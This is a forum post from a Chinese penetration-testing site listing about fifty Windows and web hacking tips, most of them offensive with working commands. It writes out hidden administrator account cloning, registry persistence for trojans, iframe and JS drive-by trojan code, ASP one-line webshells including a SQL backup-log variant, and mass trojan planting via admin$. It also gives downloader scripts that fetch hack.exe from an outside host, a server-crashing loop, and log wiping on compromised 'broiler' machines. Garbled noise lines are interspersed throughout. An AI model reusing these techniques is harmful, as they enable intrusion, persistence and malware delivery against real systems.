中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) {2 b7 [9 p2 q0 g2 u% S% L% {. p/ q2 ~
cacls C:\windows\system32 /G hqw20:R
& d$ D. W a6 T0 y
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
: [" b0 x. W& u0 ~- a' h
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ Y& d3 T# X" H3 x
: N# c8 s$ B' i0 R: d, r
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! p) b/ W* N6 ~- O! [5 r
2 u3 t; h2 J) C# D, B* y' B6 C3 q
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
- c0 U2 H% p! R3 H: B
( ~" A7 |. \4 X' u6 a4 x9 ]+ {
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 R \2 ]2 U3 A
* b! `& I+ }! @ @2 k% u
5、利用INF文件来修改注册表
4 L1 O: t0 P8 J3 `! X$ O; ]- H
[Version]
" A7 c# I6 I) M
Signature="$CHICAGO$"
( a; T2 P: s% B2 d
[Defaultinstall]
" W$ d/ C# [& Q
addREG=Ating
: I! @2 r. H2 {& X3 K: u
[Ating]
7 W6 X$ r; y6 q2 S3 l: {
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
3 c; n% f5 W: {5 Y6 F9 A) I4 }
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
3 B: {5 k' W/ I0 I8 v H/ |+ Q
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 _" a" B* @7 U1 x: C: c3 k5 w
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
$ {+ p4 R# F5 t9 M
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
' K3 y" a0 @3 _+ B
HKEY_CURRENT_CONFIG 简写为 HKCC
4 D' [* N+ g: p+ f% v
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& n W: Q% F# j4 P
"1"这里代表是写入或删除注册表键值中的具体数据
( S/ S1 q% x; O; l0 H' s+ j% N
6 a( G& @$ P& W4 f/ ]
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
* e! F9 N3 A7 |) b/ @ o
多了一步就是在防火墙里添加个端口,然后导出其键值
4 A: r; X( s. ]3 Y: i. c
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" E b- K6 ]5 ~9 {$ y
7 ]0 E$ q6 R. v6 f! _9 A- U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 Z# S9 x$ y Y4 w
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
7 S4 i- A& g+ D' V0 |
& Q. @0 G* g0 q! S% i7 y; U
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) k$ `) N, j& t; Z
; j- m, Z2 o8 F& b5 f
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
* ~! @( b0 j- n/ @! E
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( Z1 R3 ?! g) p! E' ^6 E: ^5 _
! h% `4 @0 }$ x' ]" X8 }5 @
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
+ |, ` w6 r# T3 @. X
5 F7 E, V# y% B+ K( v+ @( x
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
: k$ Y1 P: b6 l& _( C( @% b8 k( J
用法:xsniff –pass –hide –log pass.txt
; u2 y. Y0 o2 a3 m4 X2 T0 R" p6 Z
0 `9 F8 c( [( C' y; h/ m. F
12、google搜索的艺术
* }/ v9 h- v& |3 r7 c
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
$ j( |- q: F. Y! j7 m' F
或“字符串的语法错误”可以找到很多sql注入漏洞。
& `+ n6 S, h7 x2 t% f/ \+ O
" F/ Z! Z/ @$ G9 `" ^8 O% \
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
! S+ H3 f, i" {" s9 C" I( i+ b
. @- ], w) S0 X+ H
14、cmd中输入 nc –vv –l –p 1987
; [: k& X0 b4 H" J% X) S
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
/ I; G" s0 [9 G" V% {+ @
' s& n, Y! c7 j* T3 Q! t, B
15、制作T++木马,先写个ating.hta文件,内容为
- a7 z7 S2 M9 U/ M" C$ {7 ~# a
<script language="VBScript">
+ M" F* x- p0 u2 a+ f2 A4 r# X- u
set wshshell=createobject ("wscript.shell" )
+ j U- X! m) a6 Q& C# Z3 V
a=wshshell.run("你马的名称",1)
- N; B! l5 ~2 @# ~1 t
window.close
- d! x+ `& t P* M/ C7 C" M0 @
</script>
; `& X5 A2 C" t5 K. Y+ F7 i
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
8 h' h* c; l* q4 l' K5 s7 ?2 f
1 O q. \2 K& h. a& ]4 W* g Z
16、搜索栏里输入
) @) [) Z5 U3 @( T/ W
关键字%'and 1=1 and '%'='
! y2 |9 K# ]9 k) \
关键字%'and 1=2 and '%'='
; B5 g5 u6 b" @! r' h7 d( R
比较不同处 可以作为注入的特征字符
; a6 H" y1 z% e6 e' h5 @
3 s3 h9 w7 \- ?( i& u
17、挂马代码<html>
+ }1 X3 e' g1 H
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) B! t' T% H/ D/ Z P
</html>
0 o: r$ o5 n# R' X
^- O* w$ F* h
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
5 {+ u4 I1 W- }8 |7 f
net localgroup administrators还是可以看出Guest是管理员来。
0 V. s. @2 n v& Q- z( C, }/ V! x% a
$ i! Y% v0 i1 P
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
# \/ p; f+ _8 \$ j, i
用法: 安装: instsrv.exe 服务名称 路径
( f {3 b8 l8 S: m
卸载: instsrv.exe 服务名称 REMOVE
$ B8 Y$ F; l* X9 X% j( P
+ }. V2 f% R: q
. K! R1 N- K% x" y& }
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
$ d' _6 s) f, s, p3 M7 g: W! \
不能注入时要第一时间想到%5c暴库。
; U; f$ c# ]( s, z/ H* D
/ u% q7 O5 { i3 I) P, C
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ t; [$ T! O* h1 N9 V. v7 h2 U: l
y- X3 t$ r7 R6 L. _
23、缺少xp_cmdshell时
$ b: p$ |, l/ P1 V
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 W g( M, e8 x# ~
假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 }- h" n' N8 ?, A9 P
declare @o int
: a" U. k& g: r; J% d% U D( ]
exec sp_oacreate 'wscript.shell',@o out
' m) y( f U* r5 i4 a1 z; H
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
! k* V% h- b( H, t$ E3 K8 e* p
& K9 m+ w3 d7 d6 k, X, A
24.批量种植木马.bat
) w* K& z0 ?# f1 ]( k' V" M. |
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 |5 G9 ]( @! C3 @: V& Y- R
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
9 q4 D/ J& x4 `6 U
扫描地址.txt里每个主机名一行 用\\开头
. h6 e* B0 Q q8 |* N& y% P7 f0 d2 I
9 f8 v6 P; g2 t4 {3 o4 w9 O5 Z
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- H9 f: K9 H. o* w
0 [3 E; v9 u# J! }5 V, ?4 f
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
8 V% A+ p# j) ?: F
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 ^/ w) G1 E8 o# j# r n% ~+ B
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
, `. W. Q& |& T5 G' ?
Q# D# |& s' t: L4 M8 u8 }
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
/ x! t; }. t e7 d0 Y" `
然后用#clear logg和#clear line vty *删除日志
3 {" z5 t9 X2 d: U
$ T" ^5 q( ?+ R- q3 S5 \
28、电脑坏了省去重新安装系统的方法
& W4 r% `2 X. s
纯dos下执行,
! F+ \- p" v4 c$ U% W$ A3 \
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" k% k7 S) B) ]) _2 @
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 b( K3 f/ |$ }5 }4 _
& M- H! x' w6 W" M, l% O
29、解决TCP/IP筛选 在注册表里有三处,分别是:
; Y7 b: E7 D) l8 r. i' d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
/ h: v& K+ c s2 G" }4 P9 l
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: j4 n7 H( R) d' |6 @/ _% d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- a) |. M* X/ T$ l1 \- d
分别用
, a; \5 ]1 s& T) @ X
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: Q/ R: x5 h8 D$ u; G4 ]# S9 y
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ g' ` U% m0 [6 y
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; E' m! g6 v6 W! P/ Z( B( ?. s
命令来导出注册表项
; y" y! [' l* a& O! g* `+ |
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
2 ^' N l* S x! D. ]! C' [
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 K8 T% J) L9 g, I
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
: I; ~* J, W) M( p6 T7 t# g0 T" x
! e( ~% E0 K/ e$ n
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* c' x/ ^7 V% s
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' f8 n" T- u! m: E! p$ m2 m- M
* n' L- A4 d! Q9 {6 J
31、全手工打造开3389工具
- `7 g) @( Z4 p0 x ]) K; t
打开记事本,编辑内容如下:
1 w/ S* C9 I6 o
echo [Components] > c:\sql
2 x! W' @, R2 w- N
echo TSEnable = on >> c:\sql
0 ~' M7 A8 x" r( w
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' ^& z3 S( n( J9 O- K
编辑好后存为BAT文件,上传至肉鸡,执行
3 |+ o& G, A/ Z# J( P2 I F4 P
& W9 K$ {- `0 K4 d
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 h' x0 K+ K; C
( L$ y5 o1 O- z) C! |
33、让服务器重启
$ `1 T, Y2 S! }
写个bat死循环:
$ N3 d! V* W+ {! T
@echo off
& t# D; x$ \8 K3 ~7 E7 E3 _) n
:loop1
: R8 j0 f, s" }- [
cls
* j8 f1 j1 l% V. ]3 |; C
start cmd.exe
% H1 i, u% p& r* H8 Y& }
goto loop1
. q% s) w! S, L4 F6 \* d% D
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
( a2 E5 l. w" n$ @, K4 c9 C
5 d: C1 v q& S: p% |' h4 k
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
. d. N% f6 w. e1 K9 y
@echo off
: F: i3 Y( Z- u! A' C7 e
date /t >c:/3389.txt
1 J1 ~7 R; T1 D$ X# Q
time /t >>c:/3389.txt
+ E. v% C' w# n6 g$ F9 }6 C0 b. i
attrib +s +h c:/3389.bat
/ ~8 x# _- g% h" ?* H0 h6 c
attrib +s +h c:/3389.txt
! L! d; A+ E& i/ I2 u
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 ^+ R1 L9 F' x: n. {4 [9 ~
并保存为3389.bat
, Q1 {- N9 ^/ h [: i1 q6 e5 {9 o" G
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 S/ b* k4 {/ Y6 y2 \9 |, d* ?+ t
+ B0 Q" i/ |( d$ L+ D
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
# z [# k( X. v6 G# F
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
# C+ _; u9 d3 t: F+ L
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 m- y1 r$ J/ `7 V
j6 n0 r5 k/ T, l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: C x5 c3 A9 `
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
) T! h$ j9 }# G
echo 你的FTP账号 >>c:\1.bat //输入账号
: X% s4 |! z, ^. i
echo 你的FTP密码 >>c:\1.bat //输入密码
" E+ r* }! b4 n5 i# _
echo bin >>c:\1.bat //登入
# Z; ? R; d& ^" f( q* ~: [
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
- @7 F7 P. N; y W# f3 {
echo bye >>c:\1.bat //退出
) @6 r8 {) ^$ u
然后执行ftp -s:c:\1.bat即可
3 ~$ ]% ^1 ]* D! J& m
% n5 G- F% b0 P3 v0 I o( e
37、修改注册表开3389两法
) O0 u: J9 j# p* z# Q4 G
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
l2 B/ s5 b5 W1 r, G% T
echo Windows Registry Editor Version 5.00 >>3389.reg
, m0 r8 S4 v: F) D6 c4 Y" Y4 J- v
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
8 I& s. R$ [6 h8 y
echo "Enabled"="0" >>3389.reg
0 a& e! ]; o) z! g5 T# a8 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* {6 T" }' c0 U6 A- C8 \( a x; x
NT\CurrentVersion\Winlogon] >>3389.reg
8 p9 n3 w7 R- W4 N) ^0 X
echo "ShutdownWithoutLogon"="0" >>3389.reg
& T1 g4 E& k: H# F. f9 ]- i7 z) x% \/ s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
& S p% R& N U* {: l0 W' b1 v: a5 P6 Y! [
>>3389.reg
* m/ _# J* H/ P
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. U P5 _) Y/ J: _- r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
5 l: ?- {* U' s6 c# G
>>3389.reg
3 S, B6 K( \& n: r
echo "TSEnabled"=dword:00000001 >>3389.reg
5 X( Z" R1 B7 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 H# L0 B& |; I2 Z: u
echo "Start"=dword:00000002 >>3389.reg
8 G* H, B- b- b# @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 R# u/ b" d6 O5 \. `
>>3389.reg
; h1 n8 B i! X, ]( n+ h
echo "Start"=dword:00000002 >>3389.reg
/ b- d( F6 E: S! m. x- F8 d
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 ?% d( H- m) g; x& G
echo "Hotkey"="1" >>3389.reg
$ p1 t9 J- n! G2 j# m8 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- ]: |! k5 U/ J9 p$ g7 g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
0 I$ e: S+ ~- _0 `) ^: u Q, y
echo "PortNumber"=dword:00000D3D >>3389.reg
8 c8 g& o7 j" n H" Q. |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% Q5 t# V, U8 z5 ^( @8 t4 g
Server\WinStations\RDP-Tcp] >>3389.reg
5 p2 Q3 L* F$ `( o) c, U
echo "PortNumber"=dword:00000D3D >>3389.reg
0 r! D+ ], I3 @; z8 t3 W4 X
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
* p: A" C( Q1 n- M. r; t
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& ` Q% ?6 Z! x4 x0 h& Q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
8 w( L* G; y5 O8 D _- L
(2)winxp和win2003终端开启
6 O$ \2 S4 ~' M) F. V
用以下ECHO代码写一个REG文件:
6 c4 H( ~ c7 j, m9 y. q+ ?3 q: w
echo Windows Registry Editor Version 5.00>>3389.reg
6 o+ M; D, y: P# O( i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% s$ o$ v% c: \' l
Server]>>3389.reg
( M! M2 ^/ |& J8 [
echo "fDenyTSConnections"=dword:00000000>>3389.reg
& C1 z7 z8 j+ f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 D+ X) I: G, m$ ]! m
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
" x, R: J/ V% A. S' e' u2 y
echo "PortNumber"=dword:00000d3d>>3389.reg
8 x* L7 D/ L# n3 a5 H; S0 c' M) f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 D: w8 j V* x" W. _
Server\WinStations\RDP-Tcp]>>3389.reg
# ~. w5 ~* u5 {' P# z- |
echo "PortNumber"=dword:00000d3d>>3389.reg
& i, V# B2 u1 ?% S0 J: Q! ?8 Z9 i& @& s
然后regedit /s 3389.reg del 3389.reg
0 r0 D4 l3 I! q+ s" ^! N
XP下不论开终端还是改终端端口都不需重启
6 z" `/ q$ T; l5 o
+ k a; P: Z3 _2 M
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) V% j0 Q: O" h1 P
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) j" t1 C% @$ T$ C# T
8 k( x* G+ r6 S' q- E
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
4 l( X* z& ?3 G9 G/ X) y
(1)数据库文件名应复杂并要有特殊字符
; _! b9 \) O; z+ I# g6 P
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
( B) ~, \0 `, s. U# y3 c+ C" Y% D
将conn.asp文档中的
* G' X, ]/ e! s ]% B7 M w
DBPath = Server.MapPath("数据库.mdb")
1 E) z- N' `$ b* u7 V9 l8 j; }) C
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
7 o! G9 d, B, c$ c: ^% U1 b
% R# E0 `- s4 ?
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
0 W! [# s6 g* T0 w+ \* K: x6 Z
(3)不放在WEB目录里
2 K0 c7 l1 p; h* q* x
7 M5 T2 y2 i1 I3 D
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, L6 ` A( a, n9 P% E4 F2 Q0 w. n
可以写两个bat文件
, e) Y% ^ N: s; E* F2 j
@echo off
/ N& _; _5 v( j$ E) \- _* K
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
1 K* I/ z2 s$ H/ ?# C. X Q, [
@del c:\winnt\system32\query.exe
! ?6 m' X) h' d, c$ C- Y
@del %SYSTEMROOT%\system32\dllcache\query.exe
+ Z; G4 U. H7 C$ n6 [
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
+ j0 C% M! k% {! l3 Q& E
) l8 a- ~3 A! k& e, o. n
@echo off
4 z/ g( s0 [% k; R7 h6 E
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& t. c2 {: Y0 q, i) N6 l$ U
@del c:\winnt\system32\tsadmin.exe
6 _! E( y/ x8 x/ R, |7 E" }8 Q
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 ~( |# K+ ]8 s7 V( _
( D0 Z3 n* K+ c* ]/ ]9 ]
41、映射对方盘符
7 s( h. e$ |4 Q! u9 |- o
telnet到他的机器上,
- u% u( E S, h7 A$ c2 F5 R
net share 查看有没有默认共享 如果没有,那么就接着运行
& L5 Q$ M, _1 ?
net share c$=c:
- T. z- k, E9 C5 o* |$ Q/ m
net share现在有c$
* ~' s1 O8 @) ?/ r/ e @
在自己的机器上运行
% ^7 p! u8 a; n; ?4 |! z* y: S& A
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
3 [9 U8 q) E Q7 [4 z9 P7 |& n$ ^5 b3 ?. f
( @) C' z p) x+ U5 g1 Z$ Q
42、一些很有用的老知识
) Q! ^7 {/ d2 G0 ~: o3 k+ V" C
type c:\boot.ini ( 查看系统版本 )
% o; Z$ ?2 ]( W, P
net start (查看已经启动的服务)
1 y1 K! f, i6 q+ K
query user ( 查看当前终端连接 )
6 G2 u# W2 Q0 y. ?4 J5 m, g
net user ( 查看当前用户 )
' b7 k' d4 X, l+ F/ ^4 r. M+ h) S
net user 用户 密码/add ( 建立账号 )
- [/ a1 R! F4 S; W1 E- L
net localgroup administrators 用户 /add (提升某用户为管理员)
* t5 f, F. H7 A; C! M
ipconfig -all ( 查看IP什么的 )
% r' ]: D; ^0 ^* c
netstat -an ( 查看当前网络状态 )
+ L* X$ z9 K' I1 R R1 L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
$ ?3 }6 E- O( S: @* t( Z* f/ b
克隆时Administrator对应1F4
N6 I9 j2 o( x7 S+ ]" o" J
guest对应1F5
4 n3 Z0 g6 t. |3 g* `/ v
tsinternetuser对应3E8
W/ y' b6 Z5 e3 L6 N1 j
: |* C! Q$ {$ \
43、如果对方没开3389,但是装了Remote Administrator Service
* p, k8 B! b# p% F1 y& Y/ S4 ^0 i
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 I; k/ s+ ?8 V0 t( I6 n
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
2 h! E( Q) w: j7 B( d! v8 U3 v! b
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
7 y4 j& ` ?+ N# {
% C) _4 ~+ g( J
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
! e6 ~ r: }0 q& _( U) f! G: P$ S
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
2 ~- e( {; k0 F( k" u2 m; x1 w
; l. s* I& p1 m* u1 O
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 w9 G; y" t; [% x
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, p' [# a6 Z8 t1 `
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
+ |# i, ?. ~4 Y! D8 h
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 w/ ]3 q/ G6 d4 H1 T8 p
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
8 c" V2 x# C# k6 q
(这是完整的一句话,其中没有换行符)
% ?& k5 A+ W" E ^8 j0 n7 F6 X' F
然后下载:
( R) [0 u$ ?7 F* U& b. r. c' u8 o
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
5 `. p. W4 i: @0 @: G8 F$ ^1 a
2 r o5 I5 Y% w2 S5 B/ p
46、一句话木马成功依赖于两个条件:
' [5 z. p' q0 ~5 y' T3 r2 \# T8 B
1、服务端没有禁止adodb.Stream或FSO组件
8 d, H, I2 T% ?/ D. e. j8 g6 W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
" T, H1 y, n7 F8 b$ n- c
7 \/ s+ e# }( T- w5 m
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
! h& r1 D9 `8 u/ A" s4 ^( r* J
;alter database utsz set RECOVERY FULL--
/ E" _, y+ E% d3 p, i- j
;create table cmd (a image)--
' @, k8 W, y8 n. D m0 A: k
;backup log utsz to disk = 'D:\cmd' with init--
: ^8 ~, `5 B& ^: A
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- ?5 N% X( x4 V* {
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ r9 E7 L( R8 f) F f
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 B0 F. K5 n: Q
$ d7 V" H& h" {9 h3 q& m0 W
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
4 H$ S, t; R, D& L Y
, |& t4 G9 I ^# Q! x6 M
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 R9 R% _ P6 Q2 r; H0 }
所有会话用 'all'。
5 ~: [ K, J" m) e
-s sessionid 列出会话的信息。
4 `& N! B. I' ?
-k sessionid 终止会话。
( \5 \& ?0 [, [
-m sessionid 发送消息到会话。
8 K0 P$ O2 u; N% m0 ?7 H1 w
; A) l4 [+ E3 F9 x% z
config 配置 telnet 服务器参数。
7 a, t% W7 m% r5 ^ J
. Y+ S5 R6 v, e$ g5 ?- ?
common_options 为:
/ x" W- N# m, k9 J. X" I8 f: A
-u user 指定要使用其凭据的用户
) e# [5 c) O: \4 U1 x8 E6 @% H
-p password 用户密码
: F2 N7 H% v2 P3 z+ q
) D2 S$ W, M+ v, o
config_options 为:
7 }* o' m+ H$ R; o/ i P
dom = domain 设定用户的默认域
+ E& S- H, z6 w' m4 j Y( H% f
ctrlakeymap = yes|no 设定 ALT 键的映射
& K* E. F* B3 e+ g
timeout = hh:mm:ss 设定空闲会话超时值
% t5 s' W# q' t. b
timeoutactive = yes|no 启用空闲会话。
4 a# e) Z4 W; r) \( F
maxfail = attempts 设定断开前失败的登录企图数。
8 H* e# b) N O& Q8 d# P, i
maxconn = connections 设定最大连接数。
# C6 m4 I% r+ X
port = number 设定 telnet 端口。
! l! Y- C8 ^6 [2 {/ b0 v
sec = [+/-]NTLM [+/-]passwd
6 A1 D5 B) }2 c2 {, M7 {
设定身份验证机构
- O' ~. E- ^& I; Q( R
fname = file 指定审计文件名。
% D# B+ |! w+ k7 g+ h! G
fsize = size 指定审计文件的最大尺寸(MB)。
4 b: j% H' }, B( w2 ^
mode = console|stream 指定操作模式。
$ h9 \) k9 r& W; m: A6 f, d& K
auditlocation = eventlog|file|both
j2 s: d# G! V9 g G
指定记录地点
# K0 r0 i+ n% H& P1 W3 C
audit = [+/-]user [+/-]fail [+/-]admin
5 Q) s0 c2 q1 l
2 c D9 T0 |; `% W$ l) B, T8 i
49、例如:在IE上访问:
# h+ ^1 P* x4 k6 b5 f: M. G
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
7 U+ \. ?/ \% a3 k9 b! I! e0 y% q
hack.txt里面的代码是:
" ]0 U; `6 {4 _# x6 D
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& D0 t7 W8 t- @
把这个hack.txt发到你空间就可以了!
- _% X4 }7 c. {
这个可以利用来做网马哦!
( c4 v3 e9 t! e9 X6 G
5 z) @7 h; G$ M, P0 F8 w( x- ?
50、autorun的病毒可以通过手动限制!
- S7 A. i6 k1 F0 m6 V! ~" m
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) k5 b/ Y0 u" C9 |5 Q8 M
2,打开盘符用右键打开!切忌双击盘符~
+ O3 `) f7 L, N: i. A, N
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
